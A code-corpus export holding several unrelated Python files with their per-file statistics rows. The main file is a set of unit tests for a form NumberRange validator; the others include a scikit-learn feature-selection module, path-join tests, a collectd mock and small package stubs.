self.assertEqual(error_messages['NUMBER_TOO_LARGE'] % dict(max=format_number(9999999999)), str(ite.exception))
def test_within_range(self):
validator = NumberRange(minimum=0, maximum=10)
mock_form = Mock()
mock_field = Mock()
mock_field.data = 10
try:
validator(mock_form, mock_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_within_range_at_min(self):
validator = NumberRange(minimum=0, maximum=9999999999)
mock_form = Mock()
mock_field = Mock()
mock_field.data = 0
try:
validator(mock_form, mock_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_within_range_at_max(self):
validator = NumberRange(minimum=0, maximum=9999999999)
mock_form = Mock()
mock_field = Mock()
mock_field.data = 9999999999
try:
validator(mock_form, mock_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_manual_min(self):
answer = {
'min_value': {
'value': 10
},
'label': 'Min Test',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 9
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
try:
integer_field.data = 10
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_manual_max(self):
answer = {
'max_value': {
'value': 20
},
'label': 'Max Test',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 21
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_LARGE'])
try:
integer_field.data = 20
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_zero_max(self):
max_value = 0
answer = {
'max_value': {
'value': max_value
},
'label': 'Max Test',
'mandatory': False,
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
error_message = error_messages['NUMBER_TOO_LARGE'] % dict(max=max_value)
integer_field = get_number_field(answer, label, '', error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 1
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), error_message)
try:
integer_field.data = 0
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_zero_min(self):
min_value = 0
answer = {
'min_value': {
'value': min_value
},
'label': 'Min Test',
'mandatory': False,
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
error_message = error_messages['NUMBER_TOO_SMALL'] % dict(min=min_value)
integer_field = get_number_field(answer, label, '', error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = -1
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), error_message)
try:
integer_field.data = 0
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_value_range(self):
answer = {
'min_value': {
'value': 10
},
'max_value': {
'value': 20
},
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation': {
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 9
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
try:
integer_field.data = 20
test_validator(mock_form, integer_field)
integer_field.data = 10
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_answer_id_range(self):
answer = {
'min_value': {
'answer_id': 'set-minimum'
},
'max_value': {
'answer_id': 'set-maximum'
},
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation': {
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 9
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
try:
integer_field.data = 20
test_validator(mock_form, integer_field)
integer_field.data = 10
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_default_range(self):
answer = {
'decimal_places': 2,
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation': {
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
self.assertEqual(test_validator.maximum, 9999999999)
self.assertEqual(test_validator.minimum, 0)
def test_min_less_than_system_limits(self):
answer = {
'min_value': {
'value': -1000000000
},
'id': 'test-range',
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
with self.assertRaises(Exception) as ite:
get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertEqual(str(ite.exception),
'min_value: -1000000000 < system minimum: -999999999 for answer id: test-range')
def test_max_greater_than_system_limits(self):
answer = {
'max_value': {
'value': 10000000000
},
'id': 'test-range',
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
with self.assertRaises(Exception) as ite:
get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertEqual(str(ite.exception),
'max_value: 10000000000 > system maximum: 9999999999 for answer id: test-range')
def test_min_greater_than_max(self):
answer = {
'min_value': {
'value': 20
},
'max_value': {
'value': 10
},
'id': 'test-range',
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
with self.assertRaises(Exception) as ite:
get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertEqual(str(ite.exception), 'min_value: 20 > max_value: 10 for answer id: test-range')
def test_answer_id_invalid_type(self):
answer = {
'max_value': {
'answer_id': 'set-maximum-cat'
},
'label': 'Range Test 10 to 20',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
with self.assertRaises(Exception) as ite:
get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertEqual(str(ite.exception),
'answer: set-maximum-cat value: cat for answer id: test-range is not a valid number')
def test_manual_min_exclusive(self):
answer = {
'min_value': {
'value': 10,
'exclusive': True
},
'label': 'Min Test',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_SMALL_EXCLUSIVE': 'The minimum value allowed is 10. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 10
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL_EXCLUSIVE'])
try:
integer_field.data = 11
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
def test_manual_max_exclusive(self):
answer = {
'max_value': {
'value': 20,
'exclusive': True
},
'label': 'Max Test',
'mandatory': False,
'validation':
{
'messages': {
'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
'NUMBER_TOO_LARGE_EXCLUSIVE': 'The maximum value allowed is 20. Please correct your answer.'
}
},
'id': 'test-range',
'type': 'Currency'
}
label = answer['label']
returned_error_messages = answer['validation']['messages']
integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
self.assertTrue(integer_field.field_class == CustomIntegerField)
for validator in integer_field.kwargs['validators']:
if isinstance(validator, NumberRange):
test_validator = validator
mock_form = Mock()
integer_field.data = 20
with self.assertRaises(ValidationError) as ite:
test_validator(mock_form, integer_field)
self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_LARGE_EXCLUSIVE'])
try:
integer_field.data = 19
test_validator(mock_form, integer_field)
except ValidationError:
self.fail('Valid integer raised ValidationError')
| 34.965636
| 118
| 0.567125
| 2,015
| 20,350
| 5.516129
| 0.069975
| 0.066937
| 0.047413
| 0.043185
| 0.879262
| 0.848493
| 0.822582
| 0.801799
| 0.801799
| 0.801619
| 0
| 0.020532
| 0.337052
| 20,350
| 581
| 119
| 35.025818
| 0.80335
| 0.004816
| 0
| 0.690021
| 0
| 0.002123
| 0.22376
| 0.007116
| 0
| 0
| 0
| 0
| 0.080679
| 1
| 0.042463
| false
| 0
| 0.016985
| 0
| 0.061571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3141ee6e2671951af4607884d1245aef7cc0d3cb
| 31
|
py
|
Python
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 4
|
2015-11-04T21:18:40.000Z
|
2020-12-26T21:15:23.000Z
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 2
|
2021-08-09T18:19:58.000Z
|
2021-08-10T14:44:54.000Z
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 6
|
2015-08-01T17:54:17.000Z
|
2022-02-28T00:00:21.000Z
|
from .rimpo_ai import RimpoAI
| 10.333333
| 29
| 0.806452
| 5
| 31
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 31
| 2
| 30
| 15.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
314a751f58afd1795c2cb34a9dc27304b57c5d69
| 6,454
|
py
|
Python
|
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
"""
モデルベース特徴量選択
教師あり学習モデルを用いて個々の特徴量の重要度を判断して、重要なものだけを残す方法。
特徴選択に使うモデルは最終的に使うモデルと同じでなくてもよい。
SelectFromModelは、フィッティング後に coef_ またはfeature_importances_属性を持つ推定器と一緒に使用できるメタ変換器。
coef_またはfeature_importances_の対応する値が、
指定されたしきい値パラメータを下回る場合、特徴は重要ではないとみなされ、削除されます。
しきい値を数値で指定する以外にも、文字列引数を使用してしきい値を見つけるためのヒューリスティックスが組み込まれています。
利用可能なヒューリスティックスは、「平均」、「中央値」、およびこれらの浮動小数点数の「0.1 *平均」。
反復特徴量選択
すべての特徴量を利用してモデルを作り、そのモデルで最も重要度が低い特徴量を削除する。
そしてまたモデルを作り、事前に定めた数の特徴量まで繰り返す。
このために、計算量ははるかに多い。
Randomforest, Gradientboosting, SVM
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from pandas import Series, DataFrame
import seaborn as sns
sns.set_style('whitegrid')
import scipy as sp
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import RFE
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import GradientBoostingRegressor
def randomforestreg(X_train, y_train, X_test, y_test, X_name_list,threshold="median"):
'''
randomforestで特徴量選択を行う。
その後Linierregressionで識別機を作成
:param X_train:
:param y_train:
:param X_test:
:param y_test:
:param X_name_list:feature name
:return:
'''
Xl = list(range(0, len(X_name_list)))
# 特徴量選択
sfm = SelectFromModel(RandomForestRegressor(), threshold=threshold)
sfm.fit(X_train, y_train)
X_train_sfm = sfm.transform(X_train)
X_test_sfm = sfm.transform(X_test)
print("X_train.shape: {}".format(X_train.shape))
print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
reg2 = RandomForestRegressor()
reg2.fit(X_train_sfm, y_train)
print("Select From Model")
print("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
print("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
mask_sfm = sfm.get_support()
print("RandomForestRegression")
# visualize the mask_sfm. black is True, white is False
plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
plt.show()
# RFE
rfe = RFE(RandomForestRegressor())
rfe.fit(X_train, y_train)
# visualize the selected features:
mask_rfe = rfe.get_support()
print("RandomForest")
plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
X_train_rfe = rfe.transform(X_train)
X_test_rfe = rfe.transform(X_test)
print("LinearRegression")
reg3 = LinearRegression()
reg3.fit(X_train_rfe, y_train)
print("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
print("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
def gradientboostingreg(X_train, y_train, X_test, y_test, X_name_list,threshold="median"):
'''
:param X_train:
:param y_train:
:param X_test:
:param y_test:
:param Xl: feature number
:param X_name_list:feature name
:return:
'''
Xl = list(range(0, len(X_name_list)))
# 特徴量選択
sfm = SelectFromModel(GradientBoostingRegressor(), threshold=threshold)
sfm.fit(X_train, y_train)
X_train_sfm = sfm.transform(X_train)
X_test_sfm = sfm.transform(X_test)
print("X_train.shape: {}".format(X_train.shape))
print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
reg2 = GradientBoostingRegressor()
reg2.fit(X_train_sfm, y_train)
print("SFM")
print ("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
print ("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
mask_sfm = sfm.get_support()
print("GradientBoosting")
# visualize the mask_sfm. black is True, white is False
plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
plt.show()
# RFE
rfe = RFE(GradientBoostingRegressor())
rfe.fit(X_train, y_train)
# visualize the selected features:
mask_rfe = rfe.get_support()
print("GradientBoostingRegressor")
plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
X_train_rfe = rfe.transform(X_train)
X_test_rfe = rfe.transform(X_test)
print("LinearRegression","RFE")
reg3 = LinearRegression()
reg3.fit(X_train_rfe, y_train)
print ("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
print ("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
def svmreg(X_train, y_train, X_test, y_test, X_name_list,threshold="median"):
'''
:param X_train:
:param y_train:
:param X_test:
:param y_test:
:param Xl: feature number
:param X_name_list:feature name
:return:
'''
Xl = list(range(0, len(X_name_list)))
# 特徴量選択
sfm = SelectFromModel(SVR(), threshold=threshold)
sfm.fit(X_train, y_train)
X_train_sfm = sfm.transform(X_train)
X_test_sfm = sfm.transform(X_test)
print("X_train.shape: {}".format(X_train.shape))
print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
reg2 = SVR()
reg2.fit(X_train_sfm, y_train)
print("SFM")
print("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
print("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
mask_sfm = sfm.get_support()
# visualize the mask_sfm. black is True, white is False
plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
plt.xlabel("SVR")
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
plt.show()
# RFE
rfe = RFE(SVR())
rfe.fit(X_train, y_train)
# visualize the selected features:
mask_rfe = rfe.get_support()
plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
plt.yticks(())
plt.xticks(Xl, X_name_list, rotation=90)
plt.xlabel("SVR")
X_train_rfe = rfe.transform(X_train)
X_test_rfe = rfe.transform(X_test)
print("LinearRegression")
reg3 = LinearRegression()
reg3.fit(X_train_rfe, y_train)
print("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
print("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
| 31.637255
| 91
| 0.677564
| 876
| 6,454
| 4.751142
| 0.138128
| 0.069198
| 0.032436
| 0.049015
| 0.73234
| 0.716482
| 0.716482
| 0.716482
| 0.709995
| 0.709995
| 0
| 0.012505
| 0.194608
| 6,454
| 204
| 92
| 31.637255
| 0.788188
| 0.186396
| 0
| 0.723214
| 0
| 0
| 0.131241
| 0.009578
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026786
| false
| 0
| 0.107143
| 0
| 0.133929
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3166b5a3ad3e0bfab5b619020bc4e2ecd55cd4ad
| 191
|
py
|
Python
|
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
from .gw_cqt_gpu import *
from .gw_device_manager import *
from .gw_dataset import *
from .gw_model import *
from .gw_timeseries import *
from .gw_utils import *
from .gw_spectrogram import *
| 27.285714
| 32
| 0.78534
| 30
| 191
| 4.7
| 0.4
| 0.297872
| 0.510638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 7
| 33
| 27.285714
| 0.859756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
31b97cca1093685f6e9c84c02ab24c719a8bd4fb
| 34
|
py
|
Python
|
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | null | null | null |
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | 6
|
2022-02-09T15:44:34.000Z
|
2022-02-10T03:48:54.000Z
|
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | 2
|
2022-02-09T14:49:25.000Z
|
2022-02-09T16:26:11.000Z
|
def list_open_ports():
pass
| 6.8
| 22
| 0.647059
| 5
| 34
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264706
| 34
| 4
| 23
| 8.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
31c449f16c93d4d9579fb9f80c5f1157b93dbc6e
| 89
|
py
|
Python
|
test/tests/decorator_whitespace.py
|
RangelReale/libpypa
|
e4b3c359d3d2a9ccbea1cbb0a977af8219dd64ef
|
[
"Apache-2.0"
] | 152
|
2015-01-01T02:26:21.000Z
|
2022-03-04T12:18:15.000Z
|
test/tests/decorator_whitespace.py
|
kattkieru/libpypa
|
5e7a4833da515d0cd2d850d51f082000c9e9f651
|
[
"Apache-2.0"
] | 43
|
2015-01-22T00:49:10.000Z
|
2019-02-26T22:42:59.000Z
|
test/tests/decorator_whitespace.py
|
kattkieru/libpypa
|
5e7a4833da515d0cd2d850d51f082000c9e9f651
|
[
"Apache-2.0"
] | 42
|
2015-01-02T11:29:49.000Z
|
2022-03-04T12:18:17.000Z
|
# fail-if: '-x' not in EXTRA_JIT_ARGS
def dec(f):
return f
@dec
def f():
pass
| 8.9
| 37
| 0.573034
| 17
| 89
| 2.882353
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.280899
| 89
| 9
| 38
| 9.888889
| 0.765625
| 0.393258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.2
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
31e480b02abea915111647c95c60232d357fc089
| 342
|
py
|
Python
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | 2
|
2022-02-04T18:56:52.000Z
|
2022-02-18T04:46:18.000Z
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | 19
|
2021-06-29T13:03:30.000Z
|
2022-03-25T12:58:16.000Z
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | null | null | null |
from h5grove.utils import hdf_path_join
def test_root_path_join():
assert hdf_path_join("/", "child") == "/child"
def test_group_path_join():
assert hdf_path_join("/group1/group2", "data") == "/group1/group2/data"
def test_group_path_join_trailing():
assert hdf_path_join("/group1/group2/", "data") == "/group1/group2/data"
| 24.428571
| 76
| 0.710526
| 49
| 342
| 4.591837
| 0.346939
| 0.248889
| 0.195556
| 0.226667
| 0.724444
| 0.582222
| 0.435556
| 0.435556
| 0.435556
| 0.435556
| 0
| 0.0301
| 0.125731
| 342
| 13
| 77
| 26.307692
| 0.722408
| 0
| 0
| 0
| 0
| 0
| 0.254386
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.428571
| true
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9ec5296498e0533b534871a19bc71c6d137fc5da
| 180
|
py
|
Python
|
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | null | null | null |
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | 2
|
2018-11-01T03:37:25.000Z
|
2020-01-24T09:04:57.000Z
|
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | 2
|
2017-06-22T18:58:07.000Z
|
2018-10-31T12:05:06.000Z
|
def register_init(func):
pass
def register_config(func):
pass
def register_read(func):
pass
def register_write(func):
pass
def info(msg):
print(msg)
| 8.181818
| 26
| 0.65
| 25
| 180
| 4.52
| 0.44
| 0.389381
| 0.389381
| 0.504425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255556
| 180
| 21
| 27
| 8.571429
| 0.843284
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.4
| 0
| 0
| 0.5
| 0.1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
9eca9a92ab0e2049f1ea1694252391a13327f37d
| 4,089
|
py
|
Python
|
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
from random import Random
from eth2spec.test.context import (
with_altair_and_later,
spec_test,
spec_state_test,
with_custom_state,
single_phase,
low_balances, misc_balances,
)
